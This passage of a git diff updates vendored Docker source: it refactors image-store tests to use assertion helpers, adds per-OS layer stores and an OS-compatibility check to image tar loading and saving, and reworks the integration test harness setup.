img.Comment)) id2, err := is.Create([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) err = is.SetParent(id2, id1) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) pid1, err := is.GetParent(id2) - if err != nil { - t.Fatal(err) - } - if actual, expected := pid1, id1; actual != expected { - t.Fatalf("invalid parent for image: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(pid1, id1)) _, err = is.Delete(id1) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + _, err = is.Get(id1) - if err == nil { - t.Fatalf("expected get for deleted image %q to fail", id1) - } + assert.ErrorContains(t, err, "failed to get digest") + _, err = 
is.Get(id2) - if err != nil { - t.Fatal(err) - } - pid1, err = is.GetParent(id2) - if err == nil { - t.Fatalf("expected parent check for image %q to fail, got %q", id2, pid1) - } + assert.NilError(t, err) + _, err = is.GetParent(id2) + assert.ErrorContains(t, err, "failed to read metadata") } func TestSearchAfterDelete(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - is, err := NewImageStore(fs, &mockLayerGetReleaser{}) - if err != nil { - t.Fatal(err) - } + is, cleanup := defaultImageStore(t) + defer cleanup() id, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) id1, err := is.Search(string(id)[:15]) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(id1, id)) - if actual, expected := id1, id; expected != actual { - t.Fatalf("wrong id returned from search: expected %q, got %q", expected, actual) - } - - if _, err := is.Delete(id); err != nil { - t.Fatal(err) - } + _, err = is.Delete(id) + assert.NilError(t, err) - if _, err := is.Search(string(id)[:15]); err == nil { - t.Fatal("expected search after deletion to fail") - } + _, err = is.Search(string(id)[:15]) + assert.ErrorContains(t, err, "No such image") } func TestParentReset(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - is, err := NewImageStore(fs, &mockLayerGetReleaser{}) - if err != nil { - t.Fatal(err) - } + is, cleanup := defaultImageStore(t) + defer cleanup() id, err := is.Create([]byte(`{"comment": "abc1", "rootfs": {"type": "layers"}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) id2, err := is.Create([]byte(`{"comment": 
"abc2", "rootfs": {"type": "layers"}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) id3, err := is.Create([]byte(`{"comment": "abc3", "rootfs": {"type": "layers"}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - if err := is.SetParent(id, id2); err != nil { - t.Fatal(err) - } + assert.Check(t, is.SetParent(id, id2)) + assert.Check(t, cmp.Len(is.Children(id2), 1)) - ids := is.Children(id2) - if actual, expected := len(ids), 1; expected != actual { - t.Fatalf("wrong number of children: %d, got %d", expected, actual) - } + assert.Check(t, is.SetParent(id, id3)) + assert.Check(t, cmp.Len(is.Children(id2), 0)) + assert.Check(t, cmp.Len(is.Children(id3), 1)) +} - if err := is.SetParent(id, id3); err != nil { - t.Fatal(err) - } +func defaultImageStore(t *testing.T) (Store, func()) { + fsBackend, cleanup := defaultFSStoreBackend(t) - ids = is.Children(id2) - if actual, expected := len(ids), 0; expected != actual { - t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual) - } + mlgrMap := make(map[string]LayerGetReleaser) + mlgrMap[runtime.GOOS] = &mockLayerGetReleaser{} + store, err := NewImageStore(fsBackend, mlgrMap) + assert.NilError(t, err) - ids = is.Children(id3) - if actual, expected := len(ids), 1; expected != actual { - t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual) - } + return store, cleanup +} + +func TestGetAndSetLastUpdated(t *testing.T) { + store, cleanup := defaultImageStore(t) + defer cleanup() + + id, err := store.Create([]byte(`{"comment": "abc1", "rootfs": {"type": "layers"}}`)) + assert.NilError(t, err) + + updated, err := store.GetLastUpdated(id) + assert.NilError(t, err) + assert.Check(t, cmp.Equal(updated.IsZero(), true)) + assert.Check(t, store.SetLastUpdated(id)) + + updated, err = store.GetLastUpdated(id) + assert.NilError(t, err) + assert.Check(t, cmp.Equal(updated.IsZero(), false)) +} + +func TestStoreLen(t *testing.T) { + store, cleanup 
:= defaultImageStore(t) + defer cleanup() + + expected := 10 + for i := 0; i < expected; i++ { + _, err := store.Create([]byte(fmt.Sprintf(`{"comment": "abc%d", "rootfs": {"type": "layers"}}`, i))) + assert.NilError(t, err) + } + numImages := store.Len() + assert.Equal(t, expected, numImages) + assert.Equal(t, len(store.Map()), numImages) } type mockLayerGetReleaser struct{} diff --git a/vendor/github.com/docker/docker/image/tarexport/load.go b/vendor/github.com/docker/docker/image/tarexport/load.go index 01edd91fb7..c89dd08f93 100644 --- a/vendor/github.com/docker/docker/image/tarexport/load.go +++ b/vendor/github.com/docker/docker/image/tarexport/load.go @@ -1,17 +1,18 @@ -package tarexport +package tarexport // import "github.com/docker/docker/image/tarexport" import ( "encoding/json" + "errors" "fmt" "io" "io/ioutil" "os" "path/filepath" "reflect" + "runtime" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/image" "github.com/docker/docker/image/v1" "github.com/docker/docker/layer" @@ -22,18 +23,16 @@ import ( "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/pkg/symlink" "github.com/docker/docker/pkg/system" - "github.com/docker/docker/reference" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) error { - var ( - sf = streamformatter.NewJSONStreamFormatter() - progressOutput progress.Output - ) + var progressOutput progress.Output if !quiet { - progressOutput = sf.NewProgressOutput(outStream, false) + progressOutput = streamformatter.NewJSONProgressOutput(outStream, false) } - outStream = &streamformatter.StdoutFormatter{Writer: outStream, StreamFormatter: streamformatter.NewJSONStreamFormatter()} + outStream = streamformatter.NewStdoutWriter(outStream) tmpDir, err := ioutil.TempDir("", "docker-import-") if err != 
nil { @@ -80,12 +79,25 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) if err != nil { return err } - var rootFS image.RootFS - rootFS = *img.RootFS + if err := checkCompatibleOS(img.OS); err != nil { + return err + } + rootFS := *img.RootFS rootFS.DiffIDs = nil if expected, actual := len(m.Layers), len(img.RootFS.DiffIDs); expected != actual { - return fmt.Errorf("invalid manifest, layers length mismatch: expected %q, got %q", expected, actual) + return fmt.Errorf("invalid manifest, layers length mismatch: expected %d, got %d", expected, actual) + } + + // On Windows, validate the platform, defaulting to windows if not present. + os := img.OS + if os == "" { + os = runtime.GOOS + } + if runtime.GOOS == "windows" { + if (os != "windows") && (os != "linux") { + return fmt.Errorf("configuration for this image has an unsupported operating system: %s", os) + } } for i, diffID := range img.RootFS.DiffIDs { @@ -95,14 +107,14 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) } r := rootFS r.Append(diffID) - newLayer, err := l.ls.Get(r.ChainID()) + newLayer, err := l.lss[os].Get(r.ChainID()) if err != nil { - newLayer, err = l.loadLayer(layerPath, rootFS, diffID.String(), m.LayerSources[diffID], progressOutput) + newLayer, err = l.loadLayer(layerPath, rootFS, diffID.String(), os, m.LayerSources[diffID], progressOutput) if err != nil { return err } } - defer layer.ReleaseAndLog(l.ls, newLayer) + defer layer.ReleaseAndLog(l.lss[os], newLayer) if expected, actual := diffID, newLayer.DiffID(); expected != actual { return fmt.Errorf("invalid diffID for layer %d: expected %q, got %q", i, expected, actual) } @@ -117,7 +129,7 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) imageRefCount = 0 for _, repoTag := range m.RepoTags { - named, err := reference.ParseNamed(repoTag) + named, err := reference.ParseNormalizedNamed(repoTag) if err != nil { return err } @@ -126,7 +138,7 @@ 
func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) return fmt.Errorf("invalid tag %q", repoTag) } l.setLoadedTag(ref, imgID.Digest(), outStream) - outStream.Write([]byte(fmt.Sprintf("Loaded image: %s\n", ref))) + outStream.Write([]byte(fmt.Sprintf("Loaded image: %s\n", reference.FamiliarString(ref)))) imageRefCount++ } @@ -164,7 +176,7 @@ func (l *tarexporter) setParentID(id, parentID image.ID) error { return l.is.SetParent(id, parentID) } -func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, foreignSrc distribution.Descriptor, progressOutput progress.Output) (layer.Layer, error) { +func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, os string, foreignSrc distribution.Descriptor, progressOutput progress.Output) (layer.Layer, error) { // We use system.OpenSequential to use sequential file access on Windows, avoiding // depleting the standby list. On Linux, this equates to a regular os.Open. rawTar, err := system.OpenSequential(filename) @@ -193,24 +205,25 @@ func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, } defer inflatedLayerData.Close() - if ds, ok := l.ls.(layer.DescribableStore); ok { + if ds, ok := l.lss[os].(layer.DescribableStore); ok { return ds.RegisterWithDescriptor(inflatedLayerData, rootFS.ChainID(), foreignSrc) } - return l.ls.Register(inflatedLayerData, rootFS.ChainID()) + return l.lss[os].Register(inflatedLayerData, rootFS.ChainID()) } -func (l *tarexporter) setLoadedTag(ref reference.NamedTagged, imgID digest.Digest, outStream io.Writer) error { +func (l *tarexporter) setLoadedTag(ref reference.Named, imgID digest.Digest, outStream io.Writer) error { if prevID, err := l.rs.Get(ref); err == nil && prevID != imgID { - fmt.Fprintf(outStream, "The image %s already exists, renaming the old one with ID %s to empty string\n", ref.String(), string(prevID)) // todo: this message is wrong in case of multiple tags + fmt.Fprintf(outStream, "The 
image %s already exists, renaming the old one with ID %s to empty string\n", reference.FamiliarString(ref), string(prevID)) // todo: this message is wrong in case of multiple tags } - if err := l.rs.AddTag(ref, imgID, true); err != nil { - return err - } - return nil + return l.rs.AddTag(ref, imgID, true) } func (l *tarexporter) legacyLoad(tmpDir string, outStream io.Writer, progressOutput progress.Output) error { + if runtime.GOOS == "windows" { + return errors.New("Windows does not support legacy loading of images") + } + legacyLoadedMap := make(map[string]image.ID) dirs, err := ioutil.ReadDir(tmpDir) @@ -249,7 +262,7 @@ func (l *tarexporter) legacyLoad(tmpDir string, outStream io.Writer, progressOut if !ok { return fmt.Errorf("invalid target ID: %v", oldID) } - named, err := reference.WithName(name) + named, err := reference.ParseNormalizedNamed(name) if err != nil { return err } @@ -278,11 +291,21 @@ func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[str return err } - var img struct{ Parent string } + var img struct { + OS string + Parent string + } if err := json.Unmarshal(imageJSON, &img); err != nil { return err } + if err := checkCompatibleOS(img.OS); err != nil { + return err + } + if img.OS == "" { + img.OS = runtime.GOOS + } + var parentID image.ID if img.Parent != "" { for { @@ -315,7 +338,7 @@ func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[str if err != nil { return err } - newLayer, err := l.loadLayer(layerPath, *rootFS, oldID, distribution.Descriptor{}, progressOutput) + newLayer, err := l.loadLayer(layerPath, *rootFS, oldID, img.OS, distribution.Descriptor{}, progressOutput) if err != nil { return err } @@ -336,7 +359,7 @@ func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[str return err } - metadata, err := l.ls.Release(newLayer) + metadata, err := l.lss[img.OS].Release(newLayer) layer.LogReleaseMetadata(metadata) if err != nil { return err @@ -388,3 +411,19 @@ func 
checkValidParent(img, parent *image.Image) bool { } return true } + +func checkCompatibleOS(imageOS string) error { + // always compatible if the images OS matches the host OS; also match an empty image OS + if imageOS == runtime.GOOS || imageOS == "" { + return nil + } + // On non-Windows hosts, for compatibility, fail if the image is Windows. + if runtime.GOOS != "windows" && imageOS == "windows" { + return fmt.Errorf("cannot load %s image on %s", imageOS, runtime.GOOS) + } + // Finally, check the image OS is supported for the platform. + if err := system.ValidatePlatform(system.ParsePlatform(imageOS)); err != nil { + return fmt.Errorf("cannot load %s image on %s: %s", imageOS, runtime.GOOS, err) + } + return nil +} diff --git a/vendor/github.com/docker/docker/image/tarexport/save.go b/vendor/github.com/docker/docker/image/tarexport/save.go index 6e3a5bc589..4e734b3503 100644 --- a/vendor/github.com/docker/docker/image/tarexport/save.go +++ b/vendor/github.com/docker/docker/image/tarexport/save.go @@ -1,4 +1,4 @@ -package tarexport +package tarexport // import "github.com/docker/docker/image/tarexport" import ( "encoding/json" @@ -6,22 +6,27 @@ import ( "io" "io/ioutil" "os" + "path" "path/filepath" + "runtime" "time" "github.com/docker/distribution" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/image" "github.com/docker/docker/image/v1" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/system" - "github.com/docker/docker/reference" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" ) type imageDescriptor struct { - refs []reference.NamedTagged - layers []string + refs []reference.NamedTagged + layers []string + image *image.Image + layerRef layer.Layer } type saveSession struct { @@ -38,84 +43,147 @@ func (l *tarexporter) Save(names []string, outStream io.Writer) error { return err } + // Release all the image top layer references 
+ defer l.releaseLayerReferences(images) return (&saveSession{tarexporter: l, images: images}).save(outStream) } -func (l *tarexporter) parseNames(names []string) (map[image.ID]*imageDescriptor, error) { +// parseNames will parse the image names to a map which contains image.ID to *imageDescriptor. +// Each imageDescriptor holds an image top layer reference named 'layerRef'. It is taken here, should be released later. +func (l *tarexporter) parseNames(names []string) (desc map[image.ID]*imageDescriptor, rErr error) { imgDescr := make(map[image.ID]*imageDescriptor) + defer func() { + if rErr != nil { + l.releaseLayerReferences(imgDescr) + } + }() - addAssoc := func(id image.ID, ref reference.Named) { + addAssoc := func(id image.ID, ref reference.Named) error { if _, ok := imgDescr[id]; !ok { - imgDescr[id] = &imageDescriptor{} + descr := &imageDescriptor{} + if err := l.takeLayerReference(id, descr); err != nil { + return err + } + imgDescr[id] = descr } if ref != nil { - var tagged reference.NamedTagged if _, ok := ref.(reference.Canonical); ok { - return + return nil } - var ok bool - if tagged, ok = ref.(reference.NamedTagged); !ok { - var err error - if tagged, err = reference.WithTag(ref, reference.DefaultTag); err != nil { - return - } + tagged, ok := reference.TagNameOnly(ref).(reference.NamedTagged) + if !ok { + return nil } for _, t := range imgDescr[id].refs { if tagged.String() == t.String() { - return + return nil } } imgDescr[id].refs = append(imgDescr[id].refs, tagged) } + return nil } for _, name := range names { - id, ref, err := reference.ParseIDOrReference(name) + ref, err := reference.ParseAnyReference(name) if err != nil { return nil, err } - if id != "" { - _, err := l.is.Get(image.IDFromDigest(id)) - if err != nil { - return nil, err + namedRef, ok := ref.(reference.Named) + if !ok { + // Check if digest ID reference + if digested, ok := ref.(reference.Digested); ok { + id := image.IDFromDigest(digested.Digest()) + if err := addAssoc(id, nil); 
err != nil { + return nil, err + } + continue } - addAssoc(image.IDFromDigest(id), nil) - continue + return nil, errors.Errorf("invalid reference: %v", name) } - if ref.Name() == string(digest.Canonical) { + + if reference.FamiliarName(namedRef) == string(digest.Canonical) { imgID, err := l.is.Search(name) if err != nil { return nil, err } - addAssoc(imgID, nil) + if err := addAssoc(imgID, nil); err != nil { + return nil, err + } continue } - if reference.IsNameOnly(ref) { - assocs := l.rs.ReferencesByName(ref) + if reference.IsNameOnly(namedRef) { + assocs := l.rs.ReferencesByName(namedRef) for _, assoc := range assocs { - addAssoc(image.IDFromDigest(assoc.ID), assoc.Ref) + if err := addAssoc(image.IDFromDigest(assoc.ID), assoc.Ref); err != nil { + return nil, err + } } if len(assocs) == 0 { imgID, err := l.is.Search(name) if err != nil { return nil, err } - addAssoc(imgID, nil) + if err := addAssoc(imgID, nil); err != nil { + return nil, err + } } continue } - id, err = l.rs.Get(ref) + id, err := l.rs.Get(namedRef) if err != nil { return nil, err } - addAssoc(image.IDFromDigest(id), ref) + if err := addAssoc(image.IDFromDigest(id), namedRef); err != nil { + return nil, err + } } return imgDescr, nil } +// takeLayerReference will take/Get the image top layer reference +func (l *tarexporter) takeLayerReference(id image.ID, imgDescr *imageDescriptor) error { + img, err := l.is.Get(id) + if err != nil { + return err + } + imgDescr.image = img + topLayerID := img.RootFS.ChainID() + if topLayerID == "" { + return nil + } + os := img.OS + if os == "" { + os = runtime.GOOS + } + if !system.IsOSSupported(os) { + return fmt.Errorf("os %q is not supported", os) + } + layer, err := l.lss[os].Get(topLayerID) + if err != nil { + return err + } + imgDescr.layerRef = layer + return nil +} + +// releaseLayerReferences will release all the image top layer references +func (l *tarexporter) releaseLayerReferences(imgDescr map[image.ID]*imageDescriptor) error { + for _, descr := 
range imgDescr { + if descr.layerRef != nil { + os := descr.image.OS + if os == "" { + os = runtime.GOOS + } + l.lss[os].Release(descr.layerRef) + } + } + return nil +} + func (s *saveSession) save(outStream io.Writer) error { s.savedLayers = make(map[string]struct{}) s.diffIDPaths = make(map[layer.DiffID]string) @@ -143,15 +211,20 @@ func (s *saveSession) save(outStream io.Writer) error { var layers []string for _, ref := range imageDescr.refs { - if _, ok := reposLegacy[ref.Name()]; !ok { - reposLegacy[ref.Name()] = make(map[string]string) + familiarName := reference.FamiliarName(ref) + if _, ok := reposLegacy[familiarName]; !ok { + reposLegacy[familiarName] = make(map[string]string) } - reposLegacy[ref.Name()][ref.Tag()] = imageDescr.layers[len(imageDescr.layers)-1] - repoTags = append(repoTags, ref.String()) + reposLegacy[familiarName][ref.Tag()] = imageDescr.layers[len(imageDescr.layers)-1] + repoTags = append(repoTags, reference.FamiliarString(ref)) } for _, l := range imageDescr.layers { - layers = append(layers, filepath.Join(l, legacyLayerFileName)) + // IMPORTANT: We use path, not filepath here to ensure the layers + // in the manifest use Unix-style forward-slashes. Otherwise, a + // Linux image saved from LCOW won't be able to be imported on + // LCOL. 
+ layers = append(layers, path.Join(l, legacyLayerFileName)) } manifest = append(manifest, manifestItem{ @@ -214,18 +287,12 @@ func (s *saveSession) save(outStream io.Writer) error { } defer fs.Close() - if _, err := io.Copy(outStream, fs); err != nil { - return err - } - return nil + _, err = io.Copy(outStream, fs) + return err } func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Descriptor, error) { - img, err := s.is.Get(id) - if err != nil { - return nil, err - } - + img := s.images[id].image if len(img.RootFS.DiffIDs) == 0 { return nil, fmt.Errorf("empty export - not implemented") } @@ -235,7 +302,9 @@ func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Desc var foreignSrcs map[layer.DiffID]distribution.Descriptor for i := range img.RootFS.DiffIDs { v1Img := image.V1Image{ - Created: img.Created, + // This is for backward compatibility used for + // pre v1.9 docker. + Created: time.Unix(0, 0), } if i == len(img.RootFS.DiffIDs)-1 { v1Img = img.V1Image @@ -252,6 +321,7 @@ func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Desc v1Img.Parent = parent.Hex() } + v1Img.OS = img.OS src, err := s.saveLayer(rootFS.ChainID(), v1Img, img.Created) if err != nil { return nil, err @@ -304,18 +374,24 @@ func (s *saveSession) saveLayer(id layer.ChainID, legacyImg image.V1Image, creat // serialize filesystem layerPath := filepath.Join(outDir, legacyLayerFileName) - l, err := s.ls.Get(id) + operatingSystem := legacyImg.OS + if operatingSystem == "" { + operatingSystem = runtime.GOOS + } + l, err := s.lss[operatingSystem].Get(id) if err != nil { return distribution.Descriptor{}, err } - defer layer.ReleaseAndLog(s.ls, l) + defer layer.ReleaseAndLog(s.lss[operatingSystem], l) if oldPath, exists := s.diffIDPaths[l.DiffID()]; exists { relPath, err := filepath.Rel(outDir, oldPath) if err != nil { return distribution.Descriptor{}, err } - os.Symlink(relPath, layerPath) + if err := os.Symlink(relPath, layerPath); 
err != nil { + return distribution.Descriptor{}, errors.Wrap(err, "error creating symlink while saving layer") + } } else { // Use system.CreateSequential rather than os.Create. This ensures sequential // file access on Windows to avoid eating into MM standby list. diff --git a/vendor/github.com/docker/docker/image/tarexport/tarexport.go b/vendor/github.com/docker/docker/image/tarexport/tarexport.go index c0be95480e..beff668cd8 100644 --- a/vendor/github.com/docker/docker/image/tarexport/tarexport.go +++ b/vendor/github.com/docker/docker/image/tarexport/tarexport.go @@ -1,10 +1,10 @@ -package tarexport +package tarexport // import "github.com/docker/docker/image/tarexport" import ( "github.com/docker/distribution" "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/reference" + refstore "github.com/docker/docker/reference" ) const ( @@ -25,8 +25,8 @@ type manifestItem struct { type tarexporter struct { is image.Store - ls layer.Store - rs reference.Store + lss map[string]layer.Store + rs refstore.Store loggerImgEvent LogImageEvent } @@ -36,11 +36,11 @@ type LogImageEvent interface { LogImageEvent(imageID, refName, action string) } -// NewTarExporter returns new ImageExporter for tar packages -func NewTarExporter(is image.Store, ls layer.Store, rs reference.Store, loggerImgEvent LogImageEvent) image.Exporter { +// NewTarExporter returns new Exporter for tar packages +func NewTarExporter(is image.Store, lss map[string]layer.Store, rs refstore.Store, loggerImgEvent LogImageEvent) image.Exporter { return &tarexporter{ is: is, - ls: ls, + lss: lss, rs: rs, loggerImgEvent: loggerImgEvent, } diff --git a/vendor/github.com/docker/docker/image/v1/imagev1.go b/vendor/github.com/docker/docker/image/v1/imagev1.go index d498ddbc00..c341ceaa77 100644 --- a/vendor/github.com/docker/docker/image/v1/imagev1.go +++ b/vendor/github.com/docker/docker/image/v1/imagev1.go @@ -1,21 +1,18 @@ -package v1 +package v1 // import 
"github.com/docker/docker/image/v1" import ( "encoding/json" - "fmt" "reflect" - "regexp" "strings" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types/versions" "github.com/docker/docker/image" "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/stringid" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) -var validHex = regexp.MustCompile(`^([a-f0-9]{64})$`) - // noFallbackMinVersion is the minimum version for which v1compatibility // information will not be marshaled through the Image struct to remove // blank fields. @@ -109,7 +106,7 @@ func MakeConfigFromV1Config(imageJSON []byte, rootfs *image.RootFS, history []im return json.Marshal(c) } -// MakeV1ConfigFromConfig creates an legacy V1 image config from an Image struct +// MakeV1ConfigFromConfig creates a legacy V1 image config from an Image struct func MakeV1ConfigFromConfig(img *image.Image, v1ID, parentV1ID string, throwaway bool) ([]byte, error) { // Top-level v1compatibility string should be a modified version of the // image config. @@ -149,8 +146,5 @@ func rawJSON(value interface{}) *json.RawMessage { // ValidateID checks whether an ID string is a valid image ID. 
func ValidateID(id string) error { - if ok := validHex.MatchString(id); !ok { - return fmt.Errorf("image ID %q is invalid", id) - } - return nil + return stringid.ValidateID(id) } diff --git a/vendor/github.com/docker/docker/image/v1/imagev1_test.go b/vendor/github.com/docker/docker/image/v1/imagev1_test.go index 936c55e4c5..45ae783d18 100644 --- a/vendor/github.com/docker/docker/image/v1/imagev1_test.go +++ b/vendor/github.com/docker/docker/image/v1/imagev1_test.go @@ -1,4 +1,4 @@ -package v1 +package v1 // import "github.com/docker/docker/image/v1" import ( "encoding/json" diff --git a/vendor/github.com/docker/docker/integration-cli/benchmark_test.go b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go index b87e131b7e..ae0f67f6b0 100644 --- a/vendor/github.com/docker/docker/integration-cli/benchmark_test.go +++ b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go @@ -8,7 +8,7 @@ import ( "strings" "sync" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) diff --git a/vendor/github.com/docker/docker/integration-cli/check_test.go b/vendor/github.com/docker/docker/integration-cli/check_test.go index 7084d6f8af..76b17627e7 100644 --- a/vendor/github.com/docker/docker/integration-cli/check_test.go +++ b/vendor/github.com/docker/docker/integration-cli/check_test.go @@ -1,32 +1,78 @@ package main import ( + "context" "fmt" + "io/ioutil" "net/http/httptest" "os" + "path" "path/filepath" + "strconv" "sync" "syscall" "testing" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cliconfig" + "time" + + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/daemon" + "github.com/docker/docker/integration-cli/environment" + testdaemon "github.com/docker/docker/internal/test/daemon" + ienv "github.com/docker/docker/internal/test/environment" + 
"github.com/docker/docker/internal/test/fakestorage" + "github.com/docker/docker/internal/test/fixtures/plugin" + "github.com/docker/docker/internal/test/registry" "github.com/docker/docker/pkg/reexec" "github.com/go-check/check" ) -func Test(t *testing.T) { +const ( + // the private registry to use for tests + privateRegistryURL = registry.DefaultURL + + // path to containerd's ctr binary + ctrBinary = "docker-containerd-ctr" + + // the docker daemon binary to use + dockerdBinary = "dockerd" +) + +var ( + testEnv *environment.Execution + + // the docker client binary to use + dockerBinary = "" +) + +func init() { + var err error + reexec.Init() // This is required for external graphdriver tests - if !isLocalDaemon { - fmt.Println("INFO: Testing against a remote daemon") - } else { - fmt.Println("INFO: Testing against a local daemon") + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) } +} - if daemonPlatform == "linux" { - ensureFrozenImagesLinux(t) +func TestMain(m *testing.M) { + dockerBinary = testEnv.DockerBinary() + err := ienv.EnsureFrozenImagesLinux(&testEnv.Execution) + if err != nil { + fmt.Println(err) + os.Exit(1) } + + testEnv.Print() + os.Exit(m.Run()) +} + +func Test(t *testing.T) { + cli.SetTestEnvironment(testEnv) + fakestorage.SetTestEnvironment(&testEnv.Execution) + ienv.ProtectAll(t, &testEnv.Execution) check.TestingT(t) } @@ -38,18 +84,28 @@ type DockerSuite struct { } func (s *DockerSuite) OnTimeout(c *check.C) { - if daemonPid > 0 && isLocalDaemon { - signalDaemonDump(daemonPid) + if testEnv.IsRemoteDaemon() { + return + } + path := filepath.Join(os.Getenv("DEST"), "docker.pid") + b, err := ioutil.ReadFile(path) + if err != nil { + c.Fatalf("Failed to get daemon PID from %s\n", path) + } + + rawPid, err := strconv.ParseInt(string(b), 10, 32) + if err != nil { + c.Fatalf("Failed to parse pid from %s: %s\n", path, err) + } + + daemonPid := int(rawPid) + if daemonPid > 0 { + 
testdaemon.SignalDaemonDump(daemonPid) } } func (s *DockerSuite) TearDownTest(c *check.C) { - unpauseAllContainers() - deleteAllContainers() - deleteAllImages() - deleteAllVolumes() - deleteAllNetworks() - deleteAllPlugins() + testEnv.Clean(c) } func init() { @@ -60,8 +116,8 @@ func init() { type DockerRegistrySuite struct { ds *DockerSuite - reg *testRegistryV2 - d *Daemon + reg *registry.V2 + d *daemon.Daemon } func (s *DockerRegistrySuite) OnTimeout(c *check.C) { @@ -69,9 +125,10 @@ func (s *DockerRegistrySuite) OnTimeout(c *check.C) { } func (s *DockerRegistrySuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux, RegistryHosting) - s.reg = setupRegistry(c, false, "", "") - s.d = NewDaemon(c) + testRequires(c, DaemonIsLinux, RegistryHosting, SameHostDaemon) + s.reg = registry.NewV2(c) + s.reg.WaitReady(c) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerRegistrySuite) TearDownTest(c *check.C) { @@ -79,7 +136,7 @@ func (s *DockerRegistrySuite) TearDownTest(c *check.C) { s.reg.Close() } if s.d != nil { - s.d.Stop() + s.d.Stop(c) } s.ds.TearDownTest(c) } @@ -92,8 +149,8 @@ func init() { type DockerSchema1RegistrySuite struct { ds *DockerSuite - reg *testRegistryV2 - d *Daemon + reg *registry.V2 + d *daemon.Daemon } func (s *DockerSchema1RegistrySuite) OnTimeout(c *check.C) { @@ -101,9 +158,10 @@ func (s *DockerSchema1RegistrySuite) OnTimeout(c *check.C) { } func (s *DockerSchema1RegistrySuite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux, RegistryHosting, NotArm64) - s.reg = setupRegistry(c, true, "", "") - s.d = NewDaemon(c) + testRequires(c, DaemonIsLinux, RegistryHosting, NotArm64, SameHostDaemon) + s.reg = registry.NewV2(c, registry.Schema1) + s.reg.WaitReady(c) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerSchema1RegistrySuite) TearDownTest(c *check.C) { @@ -111,7 +169,7 @@ func (s 
